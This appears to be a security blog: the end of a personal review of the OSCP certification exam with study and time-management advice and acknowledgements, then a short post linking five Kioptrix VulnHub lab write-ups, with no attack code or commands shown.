I was lucky because there were several components that were very similar to some of the machines which I had rooted previously in the lab. While I cannot specifically share what exactly the components are, I believe I can share that, if you keep working on getting more machines rooted and understand the vulnerabilities that you have exploited to root those machines, trust me — you will recognize it when you see it during the exam. Of course, the exam machines will not be so straightforward, but they will most likely be made up of several vulnerabilities (which you have already seen back then in the lab) put together, where after exploiting one vulnerability, it leads to the discovery and/or exploitation of the next vulnerability. Again, time management is super important during the exam; you should not get stuck for too long and keep getting stuck in that particular spiral. Move on to the next machine and start enumerating for any attack vectors. Come back again later. Don’t give up. THE ONLY REASON WHY THE MACHINE IS THERE IS BECAUSE IT IS HACKABLE, that is the only fact that you should remember during your exam!

To sum up, it was a very fruitful and enriching 3 months of lab time taking the PWK course. Definitely, if time allows, I would love to take up other courses from Offensive Security.

A shout-out: I am very thankful to my friends at Vantage Point Security, who never fail to ask me about my progress on the lab machines, listen to my rants and give me motivational speeches. Special thanks to Paul Craig, Jin Kun and Ryan Teoh, who constantly gave me constructive advice and encouragement that kept me going, not forgetting the many ping pong sessions whenever I was having a mental block. Also thanks to my family for supporting me! Lastly, my girlfriend is so awesome, for being so understanding and considerate towards me during my busy 3 months of journey towards getting my OSCP certification.

Good luck to anyone who wishes to take up the challenge of becoming an Offensive Security Certified Professional (OSCP)!
WRITE-UP FOR KIOPTRIX VIRTUAL MACHINES FROM VULNHUB
November 3, 2016 / December 30, 2017, Wen Bin KONG
Categories: CTF, Resources
Tags: CTF, kioptrix, vm, vulnhub, writeup

I have finally completed the write-ups of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com; I hope they are helpful to you. While they are categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs. For your convenience, the following are the 5 write-ups on Kioptrix machines:

* Writeup for Kioptrix: Level 1 (#1)
* Writeup for Kioptrix: Level 1.1 (#2)
* Writeup for Kioptrix: Level 1.2 (#3)
* Writeup for Kioptrix: Level 1.3 (#4)
* Writeup for Kioptrix: 2014 (#5)

Cheerios!